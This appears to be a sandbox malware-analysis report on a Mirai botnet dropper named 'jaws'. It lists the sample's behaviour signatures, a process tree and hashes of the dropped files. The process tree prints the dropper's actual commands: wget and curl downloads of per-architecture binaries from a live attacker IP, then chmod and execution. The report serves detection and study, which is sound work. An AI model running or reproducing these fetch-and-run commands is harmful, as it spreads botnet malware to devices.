Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240729-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    30-08-2024 05:17

General

  • Target

    jaws

  • Size

    3KB

  • MD5

    4429a8d8a1c145c7f2135f7b93910618

  • SHA1

    f4a829f7fe5f475e1fc63661218303e41779de65

  • SHA256

    5f146a25218b14546812329e55b5d4b8b0e4b1caf182e4681295efa2d461b0cf

  • SHA512

    5c486e279036afbf60f6c1737141f9613f748bc8b2f6f493b10b7e69556f6df4cb2fe8c2f20846bba5ac46337bc08109cb9f0e81db7ff267a2aed2242c0affc5

Malware Config

Extracted

Family

mirai

Botnet

UNSTABLE

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Contacts a large (142458) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Executes dropped EXE 13 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Writes file to system bin folder 1 TTPs 2 IoCs
  • Changes its process name 1 IoCs
  • Reads runtime system information 49 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 23 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/jaws
    /tmp/jaws
    1⤵
    • Writes file to tmp directory
    PID:702
    • /usr/bin/wget
      wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.x86
      2⤵
      • Writes file to tmp directory
      PID:705
    • /usr/bin/curl
      curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:721
    • /bin/cat
      cat h0r0zx00x.x86
      2⤵
        PID:730
      • /bin/chmod
        chmod +x h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl
        2⤵
          PID:731
        • /tmp/hiroz3x
          ./hiroz3x jaws.exploit
          2⤵
          • Executes dropped EXE
          PID:732
        • /usr/bin/wget
          wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips
          2⤵
          • Writes file to tmp directory
          PID:735
        • /usr/bin/curl
          curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:737
        • /bin/cat
          cat h0r0zx00x.mips
          2⤵
            PID:738
          • /bin/chmod
            chmod +x h0r0zx00x.mips h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl
            2⤵
              PID:739
            • /tmp/hiroz3x
              ./hiroz3x jaws.exploit
              2⤵
              • Executes dropped EXE
              PID:740
            • /usr/bin/wget
              wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mpsl
              2⤵
              • Writes file to tmp directory
              PID:742
            • /usr/bin/curl
              curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mpsl
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:743
            • /bin/cat
              cat h0r0zx00x.mpsl
              2⤵
                PID:744
              • /bin/chmod
                chmod +x h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl
                2⤵
                  PID:745
                • /tmp/hiroz3x
                  ./hiroz3x jaws.exploit
                  2⤵
                  • Executes dropped EXE
                  • Modifies Watchdog functionality
                  • Writes file to system bin folder
                  • Changes its process name
                  • Reads runtime system information
                  PID:746
                • /usr/bin/wget
                  wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm
                  2⤵
                  • Writes file to tmp directory
                  PID:748
                • /usr/bin/curl
                  curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm
                  2⤵
                  • Reads runtime system information
                  • Writes file to tmp directory
                  PID:757
                • /bin/cat
                  cat h0r0zx00x.arm
                  2⤵
                    PID:764
                  • /bin/chmod
                    chmod +x h0r0zx00x.arm h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl
                    2⤵
                      PID:766
                    • /tmp/hiroz3x
                      ./hiroz3x jaws.exploit
                      2⤵
                      • Executes dropped EXE
                      PID:767
                    • /usr/bin/wget
                      wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm5
                      2⤵
                      • Writes file to tmp directory
                      PID:770
                    • /usr/bin/curl
                      curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm5
                      2⤵
                      • Reads runtime system information
                      • Writes file to tmp directory
                      PID:778
                    • /bin/cat
                      cat h0r0zx00x.arm5
                      2⤵
                        PID:785
                      • /bin/chmod
                        chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl
                        2⤵
                          PID:786
                        • /tmp/hiroz3x
                          ./hiroz3x jaws.exploit
                          2⤵
                          • Executes dropped EXE
                          PID:788
                        • /usr/bin/wget
                          wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm6
                          2⤵
                          • Writes file to tmp directory
                          PID:791
                        • /usr/bin/curl
                          curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm6
                          2⤵
                          • Reads runtime system information
                          • Writes file to tmp directory
                          PID:798
                        • /bin/cat
                          cat h0r0zx00x.arm6
                          2⤵
                            PID:809
                          • /bin/chmod
                            chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl
                            2⤵
                              PID:811
                            • /tmp/hiroz3x
                              ./hiroz3x jaws.exploit
                              2⤵
                              • Executes dropped EXE
                              PID:812
                            • /usr/bin/wget
                              wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm7
                              2⤵
                              • Writes file to tmp directory
                              PID:815
                            • /usr/bin/curl
                              curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm7
                              2⤵
                              • Reads runtime system information
                              • Writes file to tmp directory
                              PID:817
                            • /bin/cat
                              cat h0r0zx00x.arm7
                              2⤵
                                PID:818
                              • /bin/chmod
                                chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl
                                2⤵
                                  PID:819
                                • /tmp/hiroz3x
                                  ./hiroz3x jaws.exploit
                                  2⤵
                                  • Executes dropped EXE
                                  PID:820
                                • /usr/bin/wget
                                  wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.ppc
                                  2⤵
                                  • Writes file to tmp directory
                                  PID:822
                                • /usr/bin/curl
                                  curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.ppc
                                  2⤵
                                  • Reads runtime system information
                                  • Writes file to tmp directory
                                  PID:823
                                • /bin/cat
                                  cat h0r0zx00x.ppc
                                  2⤵
                                    PID:824
                                  • /bin/chmod
                                    chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl
                                    2⤵
                                      PID:825
                                    • /tmp/hiroz3x
                                      ./hiroz3x jaws.exploit
                                      2⤵
                                      • Executes dropped EXE
                                      PID:826
                                    • /usr/bin/wget
                                      wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.m68k
                                      2⤵
                                        PID:828
                                      • /usr/bin/curl
                                        curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.m68k
                                        2⤵
                                        • Reads runtime system information
                                        • Writes file to tmp directory
                                        PID:829
                                      • /bin/cat
                                        cat h0r0zx00x.m68k
                                        2⤵
                                          PID:834
                                        • /bin/chmod
                                          chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl
                                          2⤵
                                            PID:836
                                          • /tmp/hiroz3x
                                            ./hiroz3x jaws.exploit
                                            2⤵
                                            • Executes dropped EXE
                                            PID:838
                                          • /usr/bin/wget
                                            wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.spc
                                            2⤵
                                              PID:839
                                            • /usr/bin/curl
                                              curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.spc
                                              2⤵
                                              • Reads runtime system information
                                              • Writes file to tmp directory
                                              PID:844
                                            • /bin/cat
                                              cat h0r0zx00x.spc
                                              2⤵
                                                PID:851
                                              • /bin/chmod
                                                chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.spc h0r0zx00x.x86 hiroz3x jaws systemd-private-c038ab73a7314dd9bf862cee98886353-systemd-timedated.service-0zdcnl
                                                2⤵
                                                  PID:852
                                                • /tmp/hiroz3x
                                                  ./hiroz3x jaws.exploit
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:854
                                                • /usr/bin/wget
                                                  wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.i686
                                                  2⤵
                                                  • Writes file to tmp directory
                                                  PID:856
                                                • /usr/bin/curl
                                                  curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.i686
                                                  2⤵
                                                  • Reads runtime system information
                                                  • Writes file to tmp directory
                                                  PID:863
                                                • /bin/cat
                                                  cat h0r0zx00x.i686
                                                  2⤵
                                                    PID:870
                                                  • /bin/chmod
                                                    chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.i686 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.spc h0r0zx00x.x86 hiroz3x jaws
                                                    2⤵
                                                      PID:874
                                                    • /tmp/hiroz3x
                                                      ./hiroz3x jaws.exploit
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:875
                                                    • /usr/bin/wget
                                                      wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.sh4
                                                      2⤵
                                                        PID:877
                                                      • /usr/bin/curl
                                                        curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.sh4
                                                        2⤵
                                                        • Reads runtime system information
                                                        • Writes file to tmp directory
                                                        PID:878
                                                      • /bin/cat
                                                        cat h0r0zx00x.sh4
                                                        2⤵
                                                          PID:879
                                                        • /bin/chmod
                                                          chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.i686 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.sh4 h0r0zx00x.spc h0r0zx00x.x86 hiroz3x jaws
                                                          2⤵
                                                            PID:880
                                                          • /tmp/hiroz3x
                                                            ./hiroz3x jaws.exploit
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:881
                                                          • /usr/bin/wget
                                                            wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arc
                                                            2⤵
                                                              PID:882
                                                            • /usr/bin/curl
                                                              curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arc
                                                              2⤵
                                                              • Reads runtime system information
                                                              • Writes file to tmp directory
                                                              PID:883
                                                            • /bin/cat
                                                              cat h0r0zx00x.arc
                                                              2⤵
                                                                PID:884
                                                              • /bin/chmod
                                                                chmod +x h0r0zx00x.arc h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.i686 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.sh4 h0r0zx00x.spc h0r0zx00x.x86 hiroz3x jaws
                                                                2⤵
                                                                  PID:885
                                                                • /tmp/hiroz3x
                                                                  ./hiroz3x jaws.exploit
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:886

                                                              Network

                                                              MITRE ATT&CK Enterprise v15

                                                              Replay Monitor

                                                              Loading Replay Monitor...

                                                              Downloads

                                                              • /tmp/h0r0zx00x.x86

                                                                Filesize

                                                                30KB

                                                                MD5

                                                                01b5ca96006efd6ecba70995ac395db5

                                                                SHA1

                                                                c077939743bbdc1906b9cbd291e9e3c15b2ed613

                                                                SHA256

                                                                e68a0410f0139792d1c821e2d577323eb034b2a030dfc5d8cc8b6215c2a933ec

                                                                SHA512

                                                                7cbd89a82ab3ed0ed257cfbbb6a85b27d7a8e7af08c436a5d7104969e23269ad905d8551a1144116b950308daebc90f3515002aadcf65bff754e045714bbec44

                                                              • /tmp/hiroz3x

                                                                Filesize

                                                                32KB

                                                                MD5

                                                                37942437a545b634350c1b0b80d8371f

                                                                SHA1

                                                                deac7b16e9b9e718cc21de900f8e2e78ec6b41a7

                                                                SHA256

                                                                805d483543b0940b25147f18257251a4c24ad857c65bb1286f9f794fa1643bbd

                                                                SHA512

                                                                ba8cbe1e6744b2c6e5136ed739725988410ec0c259cfd89281b0c87c3bc4b3dd3fd15b2541a23953348a5305373f3fdbc02491ebaa6a64a8264d20f19f064fa0

                                                              • /tmp/hiroz3x

                                                                Filesize

                                                                33KB

                                                                MD5

                                                                7e03a4fa6e42aa482775fe8fc656eb29

                                                                SHA1

                                                                68c1aec948d144ec9a2befedaeea0007b96bf8cf

                                                                SHA256

                                                                f78f0bd098b133e70ee11e717bcb53430bc23c499942087473044d5dabe2ca01

                                                                SHA512

                                                                3ba610f23ec82d6c6804e21b2625fa963e7187a9e750a16372154b3bb40743042dab1248c676b638ecc3db4d608bf19193f66a848e69e3a70a2076f084f2d2e2

                                                              • /tmp/hiroz3x

                                                                Filesize

                                                                31KB

                                                                MD5

                                                                4568999226a40c97956934d7f3b623ed

                                                                SHA1

                                                                58cdfc30ccf6a12dec1dd929cbf3ceecece43d42

                                                                SHA256

                                                                96abb7f10850173a8c7b4583e49d092a51d53c9bf863aca9162f14a934e7548e

                                                                SHA512

                                                                77f728e4fa5a8c6fdcbbf6c34ea4987e4c1912da8bfd060d1dc7e639a0415f923984fca3079a87ee792d5e5817bddfeb9be02eda45c9d4c870a4c9de2e6e07c6

                                                              • /tmp/hiroz3x

                                                                Filesize

                                                                27KB

                                                                MD5

                                                                f5129e69c2a10c4ff4ff731d42ee5bed

                                                                SHA1

                                                                a975cfe7e1e8c66b592d6e33c99a288738243980

                                                                SHA256

                                                                7128b3640bac18912378cff5bfbead8a0ff169ef0dfd7ad9c16f79aa3d08ae4a

                                                                SHA512

                                                                3fe57d032eed36553f39b99ca42ba77e30010626e9789a583eab3a417f13fa329a2479b3f2854b518a3a59098887e37f4e184c331539d72046925ad3afdead70

                                                              • /tmp/hiroz3x

                                                                Filesize

                                                                54KB

                                                                MD5

                                                                8b19337d006d6fdc4e59c330efdaf6f9

                                                                SHA1

                                                                e65b4fe930c51c7b56418cf9f713350524ee0f88

                                                                SHA256

                                                                f0353e4f5b1447dbe82d3c056cb3701ad53473e4901fe79a7b42f20425f1c080

                                                                SHA512

                                                                a86486b02b5c7e68dbe2f33364d75e208ede183cbc53ec0161d09444216f2d539305ae24fa58f9af41d2a0bc036da2023836e6db40f13ccc79d6cdf40067f888